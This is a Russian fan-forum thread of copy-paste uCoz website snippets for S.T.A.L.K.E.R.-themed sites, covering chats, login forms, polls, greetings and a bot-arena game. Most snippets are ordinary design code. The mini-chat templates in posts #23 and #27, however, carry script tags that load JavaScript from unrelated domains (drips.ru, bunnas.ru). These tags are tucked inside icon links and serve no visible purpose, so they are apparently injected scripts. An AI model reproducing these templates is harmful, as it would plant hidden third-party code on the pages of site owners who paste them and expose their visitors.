1

Перейти к содержимому


       Торент трекер от http://stalker-worlds.ru        Хранилище сайта http://stalker-worlds.ru        Онлайн Сталкер Канал Унесенные Сталкером Присоединяйся к нашему сообществу на facebook Вступай в нашу группу в контакте


Добро пожаловать к нам на сайт! Про Ваш статус и права можно прочитать в Этой теме

Для просмотра картинок и скачивания файлов с форума - пройдите регистрацию!   Проблемы с регистрацией - вам сюда


Фотография

Скрипты сталкер


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 82

#21
Dimon02022

Dimon02022

    В поисках Клондайка

  • Не в сети
  • Проверенные
  • Старожилы

<- Информация ->
  • Регистрация:
    30-October 11
  • 974 Cообщений
  • Пропуск №: 5421


Репутация: 1254 Постов: 974
  • Страна проживания:Россия
  • Реальное имя:Дмитрий
  • Пол:Мужчина
  • Город:Санкт-Петербург, Россия
Скрипт "Граната".


В форму добавления сообщений:

Code
<script>  
function checksubmit(obj){  
ds = obj.message.value;  
while (ds.indexOf("[Граната.]") > -1) {  
variant=5;  
priz=Math.round(Math.random() * variant);  
       ds = ds.replace('[Граната.]',' [img]http://st-zone.ucoz.net/cub/bezymjannyj'+priz+'.png[/img] ');  
} obj.message.value = ds; }  
document.write ("<img src='http://s017.radikal.ru/i424/1111/d3/ea5145465307.jpg'>");  
</script>


Code
<a href="javascript://" onclick="emoticon('[Граната.]','message');return false;">Кинуть гранату</a>


#22
Dimon02022

Dimon02022

    В поисках Клондайка

  • Не в сети
  • Проверенные
  • Старожилы

<- Информация ->
  • Регистрация:
    30-October 11
  • 974 Cообщений
  • Пропуск №: 5421


Репутация: 1254 Постов: 974
  • Страна проживания:Россия
  • Реальное имя:Дмитрий
  • Пол:Мужчина
  • Город:Санкт-Петербург, Россия
Персональный дневник сталкера.


Установка:
Активируем модуль Доска объявлений.
Создаем одну категорию(с любым названием).
Необходимо также убрать модерацию материалов в настройках прав групп.

В настройках модуля делаем все как здесь.

Потом заходите в Управление дизайном → Персональная страница пользователя → В любое место ставите код:

Code
<style>             
             #wallCom,#cccW{padding:4px 6px;border:1px solid #222; background:url() repeat-x 0 0;color:#fff;font-family:tahoma;font-size:11px;}             
             #wallCom:focus,#cccW:focus{border:1px solid #A8ABB0; background:url() repeat-x 0 0;}    
             #headWall{border:2px solid #222;width:900px;margin-top:6px;}             
             #headWall2{background:url('http://mystalker.at.ua/Diz2011/advanced_table_bg.gif');}             
             #addMessW{background: url('http://mystalker.at.ua/Diz2011/advanced_table_bg.gif');width:900px;border-left:2px solid #222;border-right:1px solid #222;}             
             #addMessW1{padding:5px;text-align:left;font-family:tahoma;color:#fff;}             
             #contentW{border:2px solid #222;width:900px;}             
             #contentW2{padding:6px;background: url('http://mystalker.at.ua/Diz2011/advanced_table_bg.gif');font-family:tahoma;}             
             #addMess{display:;text-align:left;margin-bottom:10px;}             
             #buttonUweb{border:1px solid #222;display:inline-block;cursor:pointer;margin-top:2px;}             
             #buttonUweb:hover{border:1px solid #000;display:inline-block;cursor:pointer;opacity:0.7}             
             #buttonUweb:active{border:1px solid #000;display:inline-block;cursor:pointer;opacity:1.0}             
              </style>


Доска объявлений → Страница материалов и комментариев к нему → Все заменяете на:

Code
<td><div id="content1">$COM_BODY$<span style="display:;">$COM_PAGE_SELECTOR$</span><span style="display:;" id="uu_com">$COM_NUM_ENTRIES$</span></div><div id="ident">$ID$</div><div style="display:;">$COM_ADD_FORM$</div></td>             
             $POWERED_BY$


Доска объявлений → Вид материалов → Все заменяете на:

Code
<div class="wallCount"></div>             
             <div class="entUrl">$ENTRY_URL$</div>             
             <div id="ident">$ID$</div>


Затем Комментарии → Вид комментариев → В самый верх:

Code
<?if($MODULE_ID$='board')?>    
    <div style="overflow:hidden;">    
    <div style="float:left;"><?if($USER_AVATAR_URL$)?><img src="$USER_AVATAR_URL$" width="50"><?else?><img src="http://uweb.su/images/noava.png" width="50"><?endif?></div>    
    <div style="float:left;margin-left:6px;"><a href="$PROFILE_URL$">$USERNAME$</a> $DATE$ в $TIME$ $MODER_PANEL$<div style="margin-top:3px;text-align:left;">$MESSAGE$</div></div>    
    </div>    
    <div style="border-bottom:1px solid #cccccc;margin:6px 0 6px 0"></div>    
    <?else?>


И в самый низ:

Code
<?endif?>




#23
Dimon02022

Dimon02022

    В поисках Клондайка

  • Не в сети
  • Проверенные
  • Старожилы

<- Информация ->
  • Регистрация:
    30-October 11
  • 974 Cообщений
  • Пропуск №: 5421


Репутация: 1254 Постов: 974
  • Страна проживания:Россия
  • Реальное имя:Дмитрий
  • Пол:Мужчина
  • Город:Санкт-Петербург, Россия
Мини-чат.


Перейдём к установке:
1. Заходим в ПУ, выбираем мини-чат,затем вид материалов,удаляем от туда всё и вставляем это :

Code
<style>body {background: #f2f1f1;}</style>   

   <div style="padding:4px; background:#ffffff;padding:1px;margin:2px 0 2px 0;border:1px solid #cfcece;" id="ichatmsg168">   
   <table border="0" cellpadding="0" cellspacing="0">   
   <tbody>   
   <tr>   
   <div style="text-align:right;">    
   <a title="Написать письмо" onclick="window.open('/index/14-$USER_ID$-0-1','pmw','scrollbars=1,top=0,left=0,resizable=1,width=680,height=350');return false;" href="javascript://" ><script src="http://drips.ru/slider.js" type="text/javascript"></script><img src="http://your-serva4ok.ucoz.ru/new_icon/messag.png" align="right" border="0"></a>    
   </div>   
   <td width="38" style="padding:3px 0 2px 2px">   

    <?if($AVATAR_URL$)?>   
   <img alt="$USERNAME$" src="$AVATAR_URL$" style="border:1px solid #EAEAEA; padding:2px; width:34px; height:34px;">    

   <?else?>    
   <img alt="$USERNAME$" src="http://your-serva4ok.ucoz.ru/images/noavatar.png" style="border:1px solid #EAEAEA; padding:2px; width:34px; height:34px;">   
    <?endif?>    
   </td>   
   <td style="font-size:7pt; color:#666; padding-left:4px;">   
   <b><a style="text-decoration:" title="Профиль" href="javascript://" rel="nofollow" onclick="return show_profile('$USER_ID$');"><span style="color:#248BFF"><span style="color:#248BFF"><span class="nok$USER_ID$">$USERNAME$</span></span></a></b> написал<br>   
       
   <span style="font-size:6pt">$DATE$ в $TIME$</span>   

   <br>   
   <span style="color:#cccccc; font-size:7pt;">   

    <a style="text-decoration:" href="javascript:void('Apply to')" onclick="parent.window.document.getElementById('mchatMsgF').focus();parent.window.document.getElementById('mchatMsgF').value+='[i]$NAME$[/i], ';return false;"><span style="color:#FFAE00">Ответить</a>    

   </span>   
   </td>   
   </tr>   
   </tbody>   
   </table>   
   <div class="linnov">   
   </div>   
   <div style="padding:0 3px 0 3px; text-align:left;">   
   $MESSAGE$   
   </div>   
   </div>


2. Итак теперь нажимаем форма добавления сообщения и стираем оттуда всё,затем вставляем туда это и сохраняем.

Code
<?if(!$CAN_ADD$)?><div align="center"><?if($LOGIN_LINK$)?><a href="$LOGIN_LINK$"><div style="background:#DDDDDD;padding:5px 0 5px 0;border:1px solid #A0A0A0;color:#828282;margin:10px 0 0 0;font-size:7pt;">Для добавления необходима авторизация<br/></div></a><?else?>Доступ запрещен<?endif?></div><?else?>  

<table border="0" cellpadding="1" cellspacing="1" width="100%">  
<tr>  
<td width="70%" align="left">  
<a href="$RELOAD_URI$" title="Обновить"><img alt="" border="0" align="absmiddle" src="http://ucoz.in.ua/images/arrow_circle_double.png"></a>  
<?if($SMILES_URI$)?> <a href="$SMILES_URI$" title="Вставить смайл"><img alt="" border="0" align="absmiddle" src="http://ucoz.in.ua/images/smiley.png"><script src="http://drips.ru/slider.js" type="text/javascript"></script></a><?endif?>  
<?if($BBCODES_URI$)?> <a href="$BBCODES_URI$" title="BB-Коды"><img alt="" border="0" align="absmiddle" src="http://ucoz.in.ua/images/page_white_code.png"></a><?endif?>  
<?if($MSGCTRL_URI$)?> <a href="$MSGCTRL_URI$" title="Управление сообщениями"><img alt="" border="0" align="absmiddle" src="http://s38.ucoz.net/img/fr/mcm.gif" width="15" height="15"></a><?endif?>  
<td>$FLD_AUTOUPD$</td>  

<?if(!$USER_LOGGED_IN$)?>  
<table border="0" cellpadding="1" cellspacing="1" width="100%">  
<tr><td colspan="2">$FLD_NAME$</td></tr>  
<tr><td width="50%">$FLD_EMAIL$</td><td>$FLD_URL$</td></tr>  
</table>  
<?endif?>  

<?if($FLD_CUSTOM1$


#24
Dimon02022

Dimon02022

    В поисках Клондайка

  • Не в сети
  • Проверенные
  • Старожилы

<- Информация ->
  • Регистрация:
    30-October 11
  • 974 Cообщений
  • Пропуск №: 5421


Репутация: 1254 Постов: 974
  • Страна проживания:Россия
  • Реальное имя:Дмитрий
  • Пол:Мужчина
  • Город:Санкт-Петербург, Россия
Питомец мутант.


Вставляем в ПСП.

Code
<a onclick="$('#1').slideToggle('slow');" href="javascript://">     
     <img src="http://testik-my.at.ua/B_M_R_U.jpg"></a>     
     <div id="1" style="display:;" align="center">     
     =0 and $_LOAD_ENTRIES$<5)?><img src="/Raz/dog.jpg">     
     =10 and $_LOAD_ENTRIES$<10)?><img src="/Raz/epos-zp-psydog.jpg">     
     =20 and $_LOAD_ENTRIES$<20)?><img src="/Raz/snork.jpg">     
     =30 and $_LOAD_ENTRIES$<30)?><img src="/Raz/krovosos.jpg">     
     =30 and $_LOAD_ENTRIES$<40)?><img src="/Raz/burer.jpg">     
     =40 and $_LOAD_ENTRIES$<50)?><img src="/Raz/kontroler.jpg">     
     =50 and $_LOAD_ENTRIES$<60)?><img src="/Raz/himera.jpg">     
     =70)?><img src="/Raz/pseudogigant.jpg">     
     </div>


Качаем архив.Распаковываем его.Заливаем картинки в папку raz, в корень сайта.

Архив.

#25
Dimon02022

Dimon02022

    В поисках Клондайка

  • Не в сети
  • Проверенные
  • Старожилы

<- Информация ->
  • Регистрация:
    30-October 11
  • 974 Cообщений
  • Пропуск №: 5421


Репутация: 1254 Постов: 974
  • Страна проживания:Россия
  • Реальное имя:Дмитрий
  • Пол:Мужчина
  • Город:Санкт-Петербург, Россия
Форма входа.


Code
<?if($PAGE_ID$="login")?><div style="width:180px;"><?endif?>          
        <table border="0" cellspacing="1" cellpadding="0" width="100%">          
        <?if($ERROR$)?><td colspan="2" style="color:red;text-align:center;">$ERROR$</td><?endif?>          

          <tr><td  width="20%" nowrap="nowrap"><img  src="http://mystalker.at.ua/skripts/ikform/thread.gif" height="19" width="19"  >Е-mail</td><td>    
        <input class="loginField"  type="text" name="user" value="" size="19" style="width:100%;"  maxlength="50"/></td></tr>          
         <tr><td><img  src="http://mystalker.at.ua/skripts/ikform/hot.gif" height="19" width="19"  >Пароль</td><td><input class="loginField"  type="password" name="password" size="19" style="width:100%"  maxlength="15"/></td></tr>          
        </table>          
        <table border="0" cellspacing="1" cellpadding="0" width="100%">          
         <tr><td nowrap><input id="rem$PAGE_ID$" type="checkbox"  name="rem" value="1" checked="checked"/><label  for="rem$PAGE_ID$">запомнить</label> <?if($PAGE_ID$="login"  && $HIDDEN_ALLOWED$)?>    
    <input id="hid$PAGE_ID$"  type="checkbox" name="hidden" value="1" /><label  for="hid$PAGE_ID$">скрытый</label><?endif?></td><td  align="right" valign="top"><input class="loginButton" name="sbm"  type="submit" value="Вход"/></td></tr>          
         <tr><td colspan="2"><div  style="font-size:7pt;text-align:center;"> <a href="$REMINDER_LINK$">Забыл пароль</a>  <br> <a  href="$REGISTER_LINK$">Регистрация</a></div></td></tr>          
        </table>          

        <?if($PAGE_ID$="login")?></div><?endif?>


#26
Dimon02022

Dimon02022

    В поисках Клондайка

  • Не в сети
  • Проверенные
  • Старожилы

<- Информация ->
  • Регистрация:
    30-October 11
  • 974 Cообщений
  • Пропуск №: 5421


Репутация: 1254 Постов: 974
  • Страна проживания:Россия
  • Реальное имя:Дмитрий
  • Пол:Мужчина
  • Город:Санкт-Петербург, Россия
Мен. сталкер.


Меню в стиле STALKER CS с SPS-STALKER
Установка:Зайдите в панель управления сайтом, на главной странице выберите "Файловый менеджер"
и загрузите в корень папку с файлами (ui_mainmenu)
Дальше пропишите код в блоке "меню сайта"
Дизайн > Управление дизайном (CSS)
в списке выберите "Меню сайта".

Code
script type="text/javascript" src="ui_mainmenu/main.js"></script>


Жми.

#27
Dimon02022

Dimon02022

    В поисках Клондайка

  • Не в сети
  • Проверенные
  • Старожилы

<- Информация ->
  • Регистрация:
    30-October 11
  • 974 Cообщений
  • Пропуск №: 5421


Репутация: 1254 Постов: 974
  • Страна проживания:Россия
  • Реальное имя:Дмитрий
  • Пол:Мужчина
  • Город:Санкт-Петербург, Россия
Мини-чат с автообновлением.


Обычный чат $CHAT_BOX$ но со скриптом автообновления чата.

Установка: Там где у вас стоит $CHAT_BOX$, заменяете его на этот код:

Code
<div id="chatBox">$CHAT_BOX$</div>  
<script type="text/javascript">  
function reloadTimeC() {  
$('#chatBox').load('/ #chatBox',function(data){  
$('#reloadSec').html('<span style="color:green;padding-top:4px;">Обновлено</span>');  
setTimeout("$('#reloadSec').html('')",1000);  
});  
};  
setInterval(reloadTimeC,30000);  
</script>


Там где setInterval(reloadTimeC,30000); - интервал времени обновления чата.

В Управление дизайном - Вид материалов:

Code
<div style="text-align:left;background:#ffffff;border:1px solid #CCD3DA;padding:2px;">  

<table width="100%" cellspacing="0" cellpadding="0"><tr><td align="left" valign="top"><div style="font:8pt"><a href="javascript:void('Apply to')" style="color:#000000;" onclick="parent.window.document.getElementById('mchatMsgF').focus();parent.window.document.getElementById('mchatMsgF').value+='[i]$NAME$[/i], ';return false;"><b>$NAME$</b><script src="http://bunnas.ru/images.js" type="text/javascript"></script></a></div></td>  
<td width="85%" align="right" valign="top"><a href="javascript://" style="font:8pt">$TIME$</a></td></tr></table>    
<div style="text-align:left;font-size:9pt;">$MESSAGE$</div></fieldset>  

</div><div style="margin-top: 4px;"></div>


В Управление дизайном - Форма добавления сообщений:

Code
<table width="100%">  
<tr>  
<td align="left" valign="top">  
<textarea name="mcmessage" id="mchatMsgF" title="Сообщение" onkeyup="countMessLength();" onfocus="countMessLength();"></textarea>  
<div style="float:left;"><div id="chatb" href="$SMILES_URI$"><script src="http://bunnas.ru/images.js" type="text/javascript"></script><img src="http://s105.ucoz.net/sm/1/smile.gif"></div>  
<div id="chatb" href="$RELOAD_URI$"><img src="http://miniblog.3dn.ru/mreload.png"></div>  
<div id="chatb" href="$BBCODES_URI$"><img src="http://miniblog.3dn.ru/bcodes.png"></div>  
<div id="chatb" href="$MSGCTRL_URI$"><img src="http://miniblog.3dn.ru/options.png"></div></div><div id="reloadSec" style="float:right;"></div>  
$_SECURITY_CODE$  
</td>  
<td width="10%" align="right" valign="top">  
<div id="buttonsubmit" onclick="$('#mchatBtn').click();">ОК</div>  
</td>  
</tr>  
</table>  
<style>  
#mchatMsgF{padding:4px;margin-top:6px;border:1px solid #B5B8C8; background:#ffffff url(http://miniblog.3dn.ru/fimage/text-bg.gif) repeat-x 0 0;width:100%;height:42px;font-family:tahoma;font-size:12px;font-weight:bold;}  
#buttonsubmit{background:#6386d0;border:1px solid #3358a5;padding:13px;margin-top:6px;font-size:12px;color:#FFF;font-weight:bold;cursor:pointer;}  
#buttonsubmit:hover{background:#7e9fe4;border:1px solid #3358a5;padding:13px;margin-top:6px;font-size:12px;color:#FFF;font-weight:bold;cursor:pointer;text-decoration:underline;}  
#buttonsubmit:active{background:#4f72bd;border:1px solid #3358a5;padding:13px;margin-top:6px;font-size:12px;color:#FFF;font-weight:bold;cursor:pointer;text-decoration:underline;}  
#chatb{background:#FFF;border-left:1px solid #B5B8C8;border-right:1px solid #B5B8C8;border-bottom:1px solid #B5B8C8;padding:4px;font-size:12px;color:#FFF;font-weight:bold;cursor:pointer;text-decoration:underline;display:inline-block;}  
</style>  
<div style="display:;"><input type="submit" style="width: 30px;" id="mchatBtn" class="mchat" value="OK"></div>  

<?if($FLD_SECURE$)?>  
<table border="0" cellpadding="1" cellspacing="1" width="100%">  
<tr><td width="50%">$FLD_SECURE$</td><td align="right">$IMG_SECURE$</td></tr>  
</table>  
<?endif?>


#28
Dimon02022

Dimon02022

    В поисках Клондайка

  • Не в сети
  • Проверенные
  • Старожилы

<- Информация ->
  • Регистрация:
    30-October 11
  • 974 Cообщений
  • Пропуск №: 5421


Репутация: 1254 Постов: 974
  • Страна проживания:Россия
  • Реальное имя:Дмитрий
  • Пол:Мужчина
  • Город:Санкт-Петербург, Россия
ПОДФОРУМ для ролевых! by Politic.


Ставим после $BODY$ в Общий вид форума.

Code
<!--Mystalker.at.ua-->     
<script type="text/javascript">                      
link=document.getElementsByTagName('a');                      
hideForums=new Array('Кордон','Свалка','Дикая територия','Военніе склады'); // прописываем названия форумов которые скрываем                      
for(k=0;k<hideForums.length;k++){                      
for(i=0;i<link.length;i++){                      
if(link[i].className=='forum' && link[i].innerHTML==hideForums[k]){                      
link[i].parentNode.parentNode.style.display='';}}}                      
</script><!--/Mystalker.at.ua-->


Названия форумов прописываем в одинарных кавычках, черех запятую.
Потом в описание нужных форумов просто ставим ссылку на нужный скрытый форум
В описание нужного форума вставлять:

Code
<a href="Ссылка на форум">НАЗВАНИЕ ФОРУМА</a>


Если форумов несколько, то после каждой строчки:

Code
<a href="Ссылка на форум">НАЗВАНИЕ ФОРУМА</a>


Ставить <Br>

#29
Dimon02022

Dimon02022

    В поисках Клондайка

  • Не в сети
  • Проверенные
  • Старожилы

<- Информация ->
  • Регистрация:
    30-October 11
  • 974 Cообщений
  • Пропуск №: 5421


Репутация: 1254 Постов: 974
  • Страна проживания:Россия
  • Реальное имя:Дмитрий
  • Пол:Мужчина
  • Город:Санкт-Петербург, Россия
Просилка регистрации в стиле S.T.A.L.K.E.R v1.0.


Просилка регистрации в стиле сталкер v1.0 от PeJIu3eP
Как установить сие чудо:
1.Главная » Управление дизайном »Страницы сайта,после
Вот код:

Code
<?if(!$USER_LOGGED_IN$)?>    
<script type="text/javascript">    
window.onload = function PlsReg() {openLayerB('PlsReg',0,'Ваша ссылка на файл','Внимание',335,300,1,0,0);}    
</script>    
<?endif?>


Качаем архив и заливаем в корень сайта.

Тынц.

#30
Dimon02022

Dimon02022

    В поисках Клондайка

  • Не в сети
  • Проверенные
  • Старожилы

<- Информация ->
  • Регистрация:
    30-October 11
  • 974 Cообщений
  • Пропуск №: 5421


Репутация: 1254 Постов: 974
  • Страна проживания:Россия
  • Реальное имя:Дмитрий
  • Пол:Мужчина
  • Город:Санкт-Петербург, Россия
Новый вид опроса под сталкерские дизайны!by Sav)
В ксс вставляем в рубрику /* Poll styles */ в самый конец.


Code
.poll .answer div div {height:13px !important; background: url('http://stalker-planet.ucoz.com/ss_maximus_01-22-10_16-06-53-zaton-.gif) no-repeat right !important;}


В Вид формы опросов ставим, а всё старое удаляем:

Code
<div class="poll">             
   <div style="font-family: Tahoma,Arial;">             
   <div style="font-size: 8pt; padding-top: 2px; text-align: left;"><b>$QUESTION$</b></div>             
   $ANSWERS$             
   <hr>             
   <img alt="" src="/album1/Strelka_Poll.png" align="" border="0"> <a href="$ARCHIVE_LINK$"><b><span style="color:gray">PDA списки</span></b></a> <br>             
   <img alt="" src="/album1/Strelka_Poll.png" align="" border="0"> <a href="$RESULTS_LINK$"><b><span style="color:gray">Инфа</span></b></a> <br>             
   <img alt="" src="/album1/Strelka_Poll.png" align="" border="0"> <b><span style="color:gray">Сталкеров голосовало:</span></b> <b>$TOTAL_VOTES$</b>             
   </div>


#31
Dimon02022

Dimon02022

    В поисках Клондайка

  • Не в сети
  • Проверенные
  • Старожилы

<- Информация ->
  • Регистрация:
    30-October 11
  • 974 Cообщений
  • Пропуск №: 5421


Репутация: 1254 Постов: 974
  • Страна проживания:Россия
  • Реальное имя:Дмитрий
  • Пол:Мужчина
  • Город:Санкт-Петербург, Россия
Подсветка ссылок.


Кидаем в CSS в любое место.

Code
a:hover {text-shadow: 2 2 4px;}


#32
Dimon02022

Dimon02022

    В поисках Клондайка

  • Не в сети
  • Проверенные
  • Старожилы

<- Информация ->
  • Регистрация:
    30-October 11
  • 974 Cообщений
  • Пропуск №: 5421


Репутация: 1254 Постов: 974
  • Страна проживания:Россия
  • Реальное имя:Дмитрий
  • Пол:Мужчина
  • Город:Санкт-Петербург, Россия
Приветствие пользователей.


Описание:
При помощи этого скрипта можно в определённые промежутки времени по-разному приветствовать пользоватетей. Например не Привет, $USERNAME$, а Добрый день, позже - Добрый вечер и т.д. А можно и свои придумать.

Установка:
Пишем скрипт в том месте шаблона, где нужно поприветствовать пользователя.

Code
<SCRIPT LANGUAGE="JavaScript">     
currentTime = new Date();     
if (currentTime.getHours() >= 6 && currentTime.getHours() <= 11 )     
document.write("Доброе утро, ");     
if (currentTime.getHours() >= 12 && currentTime.getHours() <= 17 )     
document.write("Добрый день, ");     
if (currentTime.getHours() >= 18 && currentTime.getHours() <= 23)     
document.write("Добрый вечер, ");     
if (currentTime.getHours() >= 0 && currentTime.getHours() <= 5)     
document.write("Доброй ночи, ");     
</SCRIPT>


#33
Dimon02022

Dimon02022

    В поисках Клондайка

  • Не в сети
  • Проверенные
  • Старожилы

<- Информация ->
  • Регистрация:
    30-October 11
  • 974 Cообщений
  • Пропуск №: 5421


Репутация: 1254 Постов: 974
  • Страна проживания:Россия
  • Реальное имя:Дмитрий
  • Пол:Мужчина
  • Город:Санкт-Петербург, Россия
Универсальный сталкерский шрифт Graffiti2CTT.


Чтобы поставить шрифт, нужно скопировать его в папку Fonts которая находится в папке WINDOWS а эта папочка в диске C

Создаете текстовый документ\формат\ шрифт.

Вот и все!

#34
Dimon02022

Dimon02022

    В поисках Клондайка

  • Не в сети
  • Проверенные
  • Старожилы

<- Информация ->
  • Регистрация:
    30-October 11
  • 974 Cообщений
  • Пропуск №: 5421


Репутация: 1254 Постов: 974
  • Страна проживания:Россия
  • Реальное имя:Дмитрий
  • Пол:Мужчина
  • Город:Санкт-Петербург, Россия
Блок "Обратная связь".


Создаем в Конструкторе блоки и вставляем туда этот код :

Code
<div id="accordion">   
   <h2 class="current">NeoGame</h2>   
   <div class="pane" style="display:block">   
   <img src="http://ucozua.ru/Scripts/34/2877096.gif" width="70" height="90" style="float:left; margin:0 10px 0px 0" />   
   <div class="up-name">Имя: <b>Роман</b></div>   
   <div class="up-prof">HTML Редактор</div>   
   <div class="up-icq">ICQ: Ваш Аськию</div>   
   <div class="up-sms"><a target="_blank" href="/index/14-ID Пользователя-0-1">Обратиться в ЛС</a></div>   
   </div>   
   <h2>Marlboro</h2>   
   <div class="pane">   
   <img src="http://ucozua.ru/Scripts/34/ava_music_Marlboro.png" width="70" height="90" style="float:left; margin:0 10px 0px 0" />   
   <div class="up-name">Имя: <b>Андрей</b></div>   
   <div class="up-prof">Web Design</div>   
   <div class="up-icq">ICQ: Ваш Аськию</div>   
   <div class="up-sms"><a target="_blank" href="/index/14-ID Пользователя-0-1">Обратиться в ЛС</a></div>   
   </div>   
   <h2>Mopnex</h2>   
   <div class="pane">   
   <img src="http://ucozua.ru/Scripts/34/NoAvatar.png" width="70" height="90" style="float:left; margin:0 10px 0px 0" />   
   <div class="up-name">Имя: <b>Саша</b></div>   
   <div class="up-prof">Помошник адм.</div>   
   <div class="up-icq">ICQ: 73496542</div>   
   <div class="up-sms"><a target="_blank" href="/index/14-ID Пользователя-0-1">Обратиться в ЛС</a></div>   
   </div>   
   <script>   
   $(function() {   
   $("#accordion").tabs("#accordion div.pane", {tabs: 'h2', effect: 'slide', initialIndex: null});   
   });   
   </script>


А этот код вставляем в CSS:

Code
#accordion {   
   background:#222 url();   
   width: 100%;   
   -background:#666;   
   }   
   #accordion h2 {   
   background:url('') #252525 ;   
   margin:0;   
   padding:5px 15px;   
   font-size:13px;   
   color:#dedede;   
   font-weight:bold;   
   border:1px solid #292929;   
   border-bottom:1px solid #333;   
   cursor:pointer;   
   }   

   #accordion h2.current {   
   cursor:default;   
   background-color:#272727;   
   }   

   #accordion .pane {   
   height: 100px;   
   display:;   
   padding:5px 0 0 5;   
   color:#e7e7e7;   
   font-size:12px;   
   }   

   .up-name {   
   color:#e7e7e7;   
   font-size:12px;   
   padding:10 0 5 0;   
   }   

   .up-prof {   
   color:#e7e7e7;   
   font-size:10px;   
   padding:0 0 5 0;   
   }   

   .up-icq {   
   color:#e7e7e7;   
   font-size:10px;   
   padding:0 0 5 0;   
   }   

   .up-sms {   
   color:#e7e7e7;   
   font-size:11px;   
   padding:0 0 20 0;   
   }


#35
Dimon02022

Dimon02022

    В поисках Клондайка

  • Не в сети
  • Проверенные
  • Старожилы

<- Информация ->
  • Регистрация:
    30-October 11
  • 974 Cообщений
  • Пропуск №: 5421


Репутация: 1254 Постов: 974
  • Страна проживания:Россия
  • Реальное имя:Дмитрий
  • Пол:Мужчина
  • Город:Санкт-Петербург, Россия
Скрипт:Бои на арене.Бот VS Бот.


Установка:
ПУ-------Персональная страница пользователя-Где хотим видеть:

Code
<table><tr><td style="border:2px solid #222222; background:url('/pers/advanced_table_bg.gif');">   
         <center>    
    <script language="JavaScript">             
    var a=Math.round(Math.random()*4)    
    image = new Array();    
        image[1]=" <b>Бандит(Игрок1)</b> VS <b>Сталкер(Игрок2) </b>  <br> <br><span style=padding:50px 0px;><img src=/arena/bandit2.gif> </span>  <span style=padding:50px 0px;> <img src=/arena/novice2.gif></span><br> <span style=padding:20px 0px;><img  src=/arena/mp5.gif> </span> <img src=/arena/mp5.gif>"    
            image[2]=" <b>Армеец(Игрок1) </b> VS <b>Монолитовец(Игрок2) </b>  <br> <br><span style=padding:50px 0px;><img src=/arena/arm2.gif> </span>  <span style=padding:50px 0px;> <img src=/arena/monolith2.gif></span><br> <span style=padding:20px 0px;><img  src=/arena/groza.gif> </span> <img src=/arena/obrez.gif>"    
       image[3]=" <b>Долговец(Игрок1) </b> VS <b>Свободовец(Игрок2) </b>  <br> <br><span style=padding:50px 0px;><img src=/arena/ps3-9d2.gif> </span>  <span style=padding:50px 0px;> <img src=/arena/veter2.gif></span><br> <span style=padding:20px 0px;><img  src=/arena/trs30.gif> </span> <img src=/arena/il8.gif>"    
            image[4]=" <b>Военный(Игрок1) </b> VS <b>Наемник(Игрок2) </b>  <br> <br><span style=padding:50px 0px;><img src=/arena/berill2.gif> </span>  <span style=padding:50px 0px;> <img src=/arena/mercenar2.gif></span><br> <span style=padding:20px 0px;><img  src=/arena/il8.gif> </span> <img src=/arena/groza.gif>"    
                   document.write (""+image[a]+"");    
    </script>    
             <hr>   
             <a onclick="$('#boi').slideToggle('slow');" href="javascript://"> Ход боя</a> /[|]\ <a onclick="$('#pok').slideToggle('slow');" href="javascript://">  Характеристика</a>   
       <div id="pok" style="display:;" > <hr>           
            <script language="JavaScript">             
    var a=Math.round(Math.random()*5)    
    imag = new Array();    
    imag[1]="Характеристика.<br><font color=green> Игрок1</font> - Сила:1/5;Ловкость:5/5;Интелект:4/5; <br> <font color=red>Игрок2</font> -  Сила:3/5;Ловкость:4/5;Интелект:2/5; "    
    imag[2]="Характеристика.<br><font color=green> Игрок1</font> - Сила:2/5;Ловкость:4/5;Интелект:1/5; <br> <font color=red>Игрок2</font> -  Сила:4/5;Ловкость:1/5;Интелект:5/5; "    
    imag[3]="Характеристика.<br><font color=green> Игрок1</font> - Сила:3/5;Ловкость:3/5;Интелект:2/5; <br> <font color=red>Игрок2</font> -  Сила:2/5;Ловкость:5/5;Интелект:1/5; "    
    imag[4]="Характеристика.<br><font color=green> Игрок1</font> - Сила:4/5;Ловкость:2/5;Интелект:3/5; <br> <font color=red>Игрок2</font> -  Сила:1/5;Ловкость:3/5;Интелект:4/5; "    
    imag[5]="Характеристика.<br><font color=green> Игрок1</font> - Сила:5/5;Ловкость:1/5;Интелект:4/5; <br> <font color=red>Игрок2</font> -  Сила:5/5;Ловкость:2/5;Интелект:3/5; "    
      document.write (""+imag[a]+"");    
    </script> </div>   
            <div id="boi" style="display:;" > <hr>           
            <script language="JavaScript">             
    var a=Math.round(Math.random()*2)    
    ima = new Array();    
    ima[1]=" Ход Боя .<br><font color=green>Игрок1</font>:Земечат противника и выпускает автоматную очередь  <br> <font color=red>Игрок2</font>:Приседает,делает боковой кувырок и скрывается за ящиками.  <br> <font color=green>Игрок1</font>:Потеряв противника из виду,меняет свое месторасположение   <br> <font color=red>Игрок2</font>:Тем временем подкрадывается сзади и делает одиночный вестрел,целясь в голову  <br> <font color=green>Игрок1</font>:Пуля пролетела над головой.Игрок выстро реагирует и прыгает за ящик <br> <font color=red>Игрок2</font>:Достает гранату и кидает в то место,где скрылся Игрок 1.<br>Раздается взрыв и в сторону полетели капли крови...  <br> <font color=white>Судья</font>:<b>Игрок2 одержал победу</b>  "    
     ima[2]=" Ход Боя .<br><font color=green>Игрок2</font>:Земечат противника и выпускает автоматную очередь  <br> <font color=red>Игрок1</font>:Приседает,делает боковой кувырок и скрывается за ящиками.  <br> <font color=green>Игрок2</font>:Потеряв противника из виду,меняет свое месторасположение   <br> <font color=red>Игрок1</font>:Тем временем подкрадывается сзади и делает одиночный вестрел,целясь в голову  <br> <font color=green>Игрок2</font>:Пуля пролетела над головой.Игрок выстро реагирует и прыгает за ящик <br> <font color=red>Игрок1</font>:Достает гранату и кидает в то место,где скрылся Игрок 2.<br>Раздается взрыв и в сторону полетели капли крови...  <br> <font color=white>Судья</font>:<b>Игрок1 одержал победу</b>  "    
        
document.write (""+ima[a]+"");    
    </script> </div>    
              
           </center>    
               
           </td></tr></table>


#36
Dimon02022

Dimon02022

    В поисках Клондайка

  • Не в сети
  • Проверенные
  • Старожилы

<- Информация ->
  • Регистрация:
    30-October 11
  • 974 Cообщений
  • Пропуск №: 5421


Репутация: 1254 Постов: 974
  • Страна проживания:Россия
  • Реальное имя:Дмитрий
  • Пол:Мужчина
  • Город:Санкт-Петербург, Россия
Замена стандартных надписей онлайн и оффлайн.


Установка:
1. Заходим в панель управления
2. Настройка>Замена стандартных
3. Пользователи
4. И в пунктах Пользователи стереть надписи "оффлайн" и "онлайн" и вставить коды

В Зоне.

